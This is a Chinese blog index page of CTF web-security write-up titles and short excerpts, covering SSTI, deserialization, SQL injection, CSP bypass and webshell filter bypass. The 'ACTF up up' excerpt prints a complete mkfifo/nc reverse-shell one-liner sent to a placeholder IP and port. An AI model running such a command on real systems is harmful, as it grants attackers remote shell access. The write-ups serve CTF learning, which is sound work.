#Web安全

[Zer0pts2020]notepad(ssti+python反序列化)


[RoarCTF 2019]PHPShe(注入+phar反序列化)


natraj 靶机渗透


[V&N2020 公开赛]EasySpringMVC(java反序列化)


Windows下参数污染跨目录执行文件

原文链接

https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe


ACTF up up(提权)

www.zip下载得到一个一句话的后门
连接上去。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP port >/tmp/f


[Zer0pts2020]musicblog(绕过CSP。进行请求)

我们输入的东西。管理员会给你点赞


[RCTF2019]calcalcalc (盲注)

github下源码。
打开index.hbs。


RACTF(Web)

Web有两个系列的题。考点都比较简单。
主要就是考思路吧。


[Zer0pts2020]phpNantokaAdmin(sqlite)

首先下源码。
看index.php关键代码


[HarekazeCTF2019]Avatar Uploader 2(include phar+代码审计)

github下源码审计
首先从index.php看。
导入了三个文件

require_once('config.php');
require_once('lib/util.php');
require_once('lib/session.php');


l33t-hoster(.htaccess+disable_function+计算器)


RCTF2020 Calc(数字webshell以及php交互)

访问calc.php得到源码

['[a-z]', '[\x7f-\xff]', '\s',"'", '"', '`', '\[', '\]','\$', '_', '\\\\','\^', ',']
不允许出现a-z以及一些不可见字符。等

但是这里还允许数字。括号。点。|&


LFI2019(文件包含。无数字字母webshell)

下源码审计。


[Chaos Communication Camp 2019]PDFCreator

首先就github上源码。
在index.php末尾部分中看到如下代码


← 上一页 下一页 →